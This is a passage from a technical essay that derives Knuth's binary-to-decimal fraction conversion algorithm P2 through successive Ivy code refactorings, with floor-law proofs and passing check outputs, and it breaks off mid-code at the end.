<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while p <= 4
d = p round f
:if (min <= d) and (d < max)
:ret p digits d * 10**p
:end
p = p + 1
:end
p digits (p round f) * 10**p
</pre>
<pre class='language-ivy'>check 'rounding bin2dec refactored'
-- out --
✅ rounding bin2dec refactored
</pre>
<p>
Next we can apply the <a href="#truncating">Truncating Lemma</a> to the loop body:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while p <= 4
:if (p ceil min) <= (p floor max)
:ret p digits (p floor max) * 10**p
:end
p = p + 1
:end
p digits (p round f) * 10**p
</pre>
<pre class='language-ivy'>check 'truncating bin2dec'
-- out --
✅ truncating bin2dec
</pre>
<p>
This version of <code>bin2dec</code> is much closer to <i>P2</i>,
although not yet visibly so.
<a class=anchor href="#premultiplication"><h2 id="premultiplication">Premultiplication</h2></a>
<p>
Next we need to apply a basic optimization.
The expressions <code>p ceil min</code>, <code>p floor max</code>,
and <code>p round f</code> hide repeated multiplication
and division by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
We can avoid those by multiplying <math><MI>𝑚𝑖𝑛</MI></math>, <math><MI>𝑚𝑎𝑥</MI></math>, and <math><mi>f</mi></math> by <math><mn>10</mn></math> on each iteration
instead.
<p>
As an intermediate step, let’s write the multiplications by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> explicitly,
changing <code>p ceil x</code> to <code>(ceil x * 10**p) / 10**p</code> and so on:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while p <= 4
:if ((ceil min * 10**p) / 10**p) <= ((floor max * 10**p) / 10**p)
:ret p digits ((floor max * 10**p) / 10**p) * 10**p
:end
p = p + 1
:end
p digits ((round f * 10**p) / 10**p) * 10**p
</pre>
<pre class='language-ivy'>check 'multiplied bin2dec'
-- out --
✅ multiplied bin2dec
</pre>
<p>
Next, we can simplify away all the divisions by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
In the comparison,
not dividing both sides by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>
leaves the result unchanged,
and the other divisions are immediately re-multiplied by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while p <= 4
:if (ceil min * 10**p) <= (floor max * 10**p)
:ret p digits (floor max * 10**p)
:end
p = p + 1
:end
p digits (round f * 10**p)
</pre>
<pre class='language-ivy'>check 'simplified'
-- out --
✅ simplified
</pre>
<p>
Finally, we can replace the multiplication by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>
with multiplying <math><mi>f</mi></math>, <math><MI>𝑚𝑖𝑛</MI></math>, and <math><MI>𝑚𝑎𝑥</MI></math> by <math><mn>10</mn></math>
each time we increment <math><mi>p</mi></math>:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
f = 10 * f
min = 10 * min
max = 10 * max
:while p <= 4
:if (ceil min) <= (floor max)
:ret p digits floor max
:end
p = p + 1
f = 10 * f
min = 10 * min
max = 10 * max
:end
p digits round f
</pre>
<pre class='language-ivy'>check 'premultiplied'
-- out --
✅ premultiplied
</pre>
<a class=anchor href="#collecting_digits"><h2 id="collecting_digits">Collecting Digits</h2></a>
<p>
At this point the only important difference between Knuth’s <i>P2</i>
and our current <code>bin2dec</code> is that <i>P2</i> computes one digit
per loop iteration instead of computing them all
from a single integer when returning.
As we saw above, <code>bin2dec</code> is walking along the
decimal form of <math><MI>𝑚𝑖𝑛</MI></math>, <math><mi>f</mi></math>, and <math><MI>𝑚𝑎𝑥</MI></math>
until they diverge,
at which point it can return an answer.
Intuitively, since the walk continues only while
the digits of all decimals in the accuracy interval agree,
it is fine to collect one digit per step along the walk.
<p>
To help prove that intuition more formally, we need the following law of floors,
which Knuth also uses.
For all integers <math><mi>a</mi></math> and <math><mi>b</mi></math> with <math><mrow><mi>b</mi><mo>></mo><mn>0</mn></mrow></math>:<div class=math><math display=block><mrow><mrow><mo>⌊</mo><mfrac><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo>+</mo><mi>a</mi></mrow><mi>b</mi></mfrac><mo>⌋</mo></mrow><mo>=</mo><mrow><mo>⌊</mo><mfrac><mrow><mphantom><mo stretchy=false>⌊</mo></mphantom><mi>x</mi><mo>+</mo><mi>a</mi><mphantom><mo stretchy=false>⌋</mo></mphantom></mrow><mi>b</mi></mfrac><mo>⌋</mo></mrow><mn>.</mn></mrow></math></div>
<p>
Now we are ready to prove the necessary lemma.
<div class=lemma id=collection>
<p>
<b><i>Digit Collection Lemma</i></b>.
Let <math><mrow><MI>𝑚𝑖𝑛</MI><mo>=</mo><mi>f</mi><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> and <math><mrow><MI>𝑚𝑎𝑥</MI><mo>=</mo><mi>f</mi><mo>+</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>.
For <math><mrow><mi>p</mi><mo>≥</mo><mn>1</mn></mrow></math>, the <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></math>-digit decimal <math><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub></math> has <math><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></math> as its leading digits:<div class=math><math display=block><mrow><msub><mrow><mo>⌊</mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>⌋</mo></mrow><mi>p</mi></msub><mo>=</mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub><mn>.</mn></mrow></math></div>
<p>
Furthermore, for <math><mrow><mi>p</mi><mo>=</mo><mn>4</mn></mrow></math>, if <math><mrow><msub><mrow><mo>⌈</mo><MI>𝑚𝑖𝑛</MI><mo>⌉</mo></mrow><mi>p</mi></msub><mo>></mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></mrow></math> then the <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></math>-digit decimal <math><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub></math> has
<math><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></math> as its leading digits:<div class=math><math display=block><mrow><msub><mrow><mo>⌊</mo><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>⌋</mo></mrow><mi>p</mi></msub><mo>=</mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub><mn>.</mn></mrow></math></div>
<p>
<i>Proof</i>.
For the first half, we can prove the result for any <math><mrow><mi>p</mi><mo>≥</mo><mn>1</mn></mrow></math> and any <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math>, not just <math><mrow><mi>x</mi><mo>=</mo><MI>𝑚𝑎𝑥</MI></mrow></math>:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>⌊</mo><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mrow><mo>(</mo><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>1</mn><mn>0</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>)</mo></mrow><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mspace width='1em' /></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mrow><mspace width='0.3em' /><mtext>and</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[law</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floors]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mtext>]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
For the second half, <math><mrow><msub><mrow><mo>⌈</mo><MI>𝑚𝑖𝑛</MI><mo>⌉</mo></mrow><mi>p</mi></msub><mo>></mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></mrow></math>
expands to <math><mrow><msub><mrow><mo>⌈</mo><mrow><mi>f</mi><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌉</mo></mrow><mi>p</mi></msub><mo>></mo><msub><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>+</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌋</mo></mrow><mi>p</mi></msub></mrow></math>,
which implies <math><mi>f</mi></math> is at least <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> away
from the nearest exact <math><mi>p</mi></math>-digit decimal in either direction:
<math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>≤</mo><msub><mrow><mo>{</mo><mi>f</mi><mo>}</mo></mrow><mi>p</mi></msub><mo><</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>,
or equivalently <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>≤</mo><mrow><mo>{</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>}</mo></mrow><mo><</mo><mn>1</mn><mo>−</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>.
Note in particular that since <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>4</mn></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>></mo><mn>1/20</mn></mrow></math>,
<math><mrow><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><mo>=</mo><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>+</mo><mn>1/20</mn></mrow><mo>⌋</mo></mrow><mo>=</mo><mrow><mo>⌊</mo><mrow><MI>𝑚𝑎𝑥</MI><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow></mrow></math>.
<p>
Now:<div class=math><math display=block><mtable><mtr><mtd><msub><mrow><mo>⌊</mo><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mrow><mo>(</mo><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>1</mn><mn>0</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>)</mo></mrow><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>[</mo><mrow></mrow><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mo stretchy=false>(</mo><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>+</mo><mn>½</mn><mo stretchy=false>)</mo><MO>/</MO><mn>10</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[law</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floors]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' 
/><mi>p</mi></msup><mo>+</mo><mn>1/20</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><MI>𝑚𝑎𝑥</MI><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[noted</mtext><mspace width='0.3em' /><mtext>above]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mtext>]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
(As an aside, this result is not a fluke of 16-bit binary fractions and <math><mrow><mi>p</mi><mo>=</mo><mn>4</mn></mrow></math>.
For any <math><mi>b</mi></math>-bit binary fraction, there is an accurate, correctly rounded <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></math>-digit decimal for <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn><mo>=</mo><mrow><mo>⌈</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow><mo>⌉</mo></mrow></mrow></math>,
because <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>></mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>. That implies <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mo stretchy=false>(</mo><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn><mo stretchy=false>)</mo></mrow></msup><mo>></mo><mn>1/20</mn></mrow></math>.)
</div>
<p>
The Digit Collection Lemma proves the correctness of saving one digit per iteration
and using that sequence as the final result.
Let’s make that change.
Here is our current version:
<pre class='language-ivy'>)op bin2dec
-- out --
op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
f = 10 * f
min = 10 * min
max = 10 * max
:while p <= 4
:if (ceil min) <= (floor max)
:ret p digits floor max
:end
p = p + 1
f = 10 * f
min = 10 * min
max = 10 * max
:end
p digits round f
</pre>
<p>
Updating it to collect digits, we have:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
f = 10 * f
min = 10 * min
max = 10 * max
d = ()
:while p <= 4
d = d, (floor max) mod 10
:if (ceil min) <= (floor max)
:ret d
:end
p = p + 1
f = 10 * f
min = 10 * min
max = 10 * max
:end
d, (round f) mod 10
</pre>
<pre class='language-ivy'>check 'collecting digits'
-- out --
✅ collecting digits
</pre>
<p>
This program is very close to <i>P2</i>.
All that remains are straightforward optimizations.
<a class=anchor href="#change_of_basis"><h2 id="change_of_basis">Change of Basis</h2></a>
<p>
The first optimization is to remove one of the three multiplications
in the loop body,
using the fact that <math><MI>𝑚𝑖𝑛</MI></math>, <math><mi>f</mi></math>, and <math><MI>𝑚𝑎𝑥</MI></math>
are linearly dependent.
If it were up to me, I would keep <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math>
and derive <math><mrow><mi>f</mi><mo>=</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑛</MI><mo>+</mo><MI>𝑚𝑎𝑥</MI><mo stretchy=false>)</mo><mn>/2</mn></mrow></math> as needed,
but to match <i>P2</i>, we will instead keep
<math><mrow><mi>s</mi><mo>=</mo><MI>𝑚𝑎𝑥</MI></mrow></math> and <math><mrow><mi>t</mi><mo>=</mo><MI>𝑚𝑎𝑥</MI><mo>−</mo><MI>𝑚𝑖𝑛</MI></mrow></math>,
deriving <math><mrow><MI>𝑚𝑎𝑥</MI><mo>=</mo><mi>s</mi></mrow></math>, <math><mrow><MI>𝑚𝑖𝑛</MI><mo>=</mo><mi>s</mi><mo>−</mo><mi>t</mi></mrow></math>, and <math><mrow><mi>f</mi><mo>=</mo><mi>s</mi><mo>−</mo><mi>t</mi><mn>/2</mn></mrow></math> as needed.
<p>
Let’s make that change to the program:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while p <= 4
d = d, (floor s) mod 10
:if (ceil s-t) <= (floor s)
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
d, (round s - t/2) mod 10
</pre>
<pre class='language-ivy'>check 'change of basis'
-- out --
✅ change of basis
</pre>
<a class=anchor href="#discard_integer_parts"><h2 id="discard_integer_parts">Discard Integer Parts</h2></a>
<p>
The next optimization is to reduce the size of <math><mi>s</mi></math> (formerly <math><MI>𝑚𝑎𝑥</MI></math>).
The only use of the integer part of <math><mi>s</mi></math> is to save
the ones digit on each iteration,
so we can discard the integer part
with <code>s = s mod 1</code> each time we save the ones digit.
That lets us optimize away the two uses of <code>mod 10</code>:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while p <= 4
d = d, floor s
s = s mod 1
:if (ceil s-t) <= (floor s)
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
d, round s - t/2
</pre>
<pre class='language-ivy'>check 'discard integer parts'
-- out --
✅ discard integer parts
</pre>
<p>
After the new <code>s = s mod 1</code>, <math><mrow><mrow><mo>⌊</mo><mi>s</mi><mo>⌋</mo></mrow><mo>=</mo><mn>0</mn></mrow></math>,
so the <code>if</code> condition is really <math><mrow><mrow><mo>⌈</mo><mrow><mi>s</mi><mo>−</mo><mi>t</mi></mrow><mo>⌉</mo></mrow><mo>≤</mo><mn>0</mn></mrow></math>,
which simplifies to <math><mrow><mi>s</mi><mo>≤</mo><mi>t</mi></mrow></math>.
Let’s make that change too:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while p <= 4
d = d, floor s
s = s mod 1
:if s <= t
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
d, round s - t/2
</pre>
<pre class='language-ivy'>check 'simplify condition'
-- out --
✅ simplify condition
</pre>
<a class=anchor href="#refactoring"><h2 id="refactoring">Refactoring</h2></a>
<p>
Next, we can inline <code>round</code> on the last line:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while p <= 4
d = d, floor s
s = s mod 1
:if s <= t
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
s = (s - t/2) + 1/2
d, floor s
</pre>
<pre class='language-ivy'>check 'inlined round'
-- out --
✅ inlined round
</pre>
<p>
Now the two uses of ‘<code>d, floor s</code>’ can be merged
by moving the final return back into the loop,
provided
(1) we make the <code>while</code> loop repeat forever,
(2) we apply the final adjustment to <math><mi>s</mi></math> when <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>,
and (3) we ensure that when <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>, the <code>if</code> condition is true,
so that the return is reached.
The <code>if</code> condition is checking for digit divergence,
and we know that <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math> will always diverge
by <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>, so the condition <math><mrow><mi>s</mi><mo>≤</mo><mi>t</mi></mrow></math> will be true.
We can also confirm that arithmetically:
<math><mrow><mi>t</mi><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>16</mn></mrow></msup><mo>></mo><mn>1</mn><mo>></mo><mi>s</mi></mrow></math>.
<p>
Let’s make that change:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while 1
:if p == 5
s = (s - t/2) + 1/2
:end
d = d, floor s
s = s mod 1
:if s <= t
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
</pre>
<pre class='language-ivy'>check 'return only in loop'
-- out --
✅ return only in loop
</pre>
<p>
Next, since <math><mrow><mi>t</mi><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>16</mn></mrow></msup></mrow></math>, we can replace the condition <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>
with <math><mrow><mi>t</mi><mo>></mo><mn>1</mn></mrow></math>, after which <math><mi>p</mi></math> is unused and can be deleted:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
s = 10 * s
t = 10 * t
d = ()
:while 1
:if t > 1
s = (s - t/2) + 1/2
:end
d = d, floor s
s = s mod 1
:if s <= t
:ret d
:end
s = 10 * s
t = 10 * t
:end
</pre>
<pre class='language-ivy'>check 'optimize away p'
-- out --
✅ optimize away p
</pre>
<p>
Next, note that the truth of <math><mrow><mi>s</mi><mo>≤</mo><mi>t</mi></mrow></math> is unchanged by
multiplying both <math><mi>s</mi></math> and <math><mi>t</mi></math> by 10
(and the return does not use them)
so we can move the conditional return
to the end of the loop body:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
s = 10 * s
t = 10 * t
d = ()
:while 1
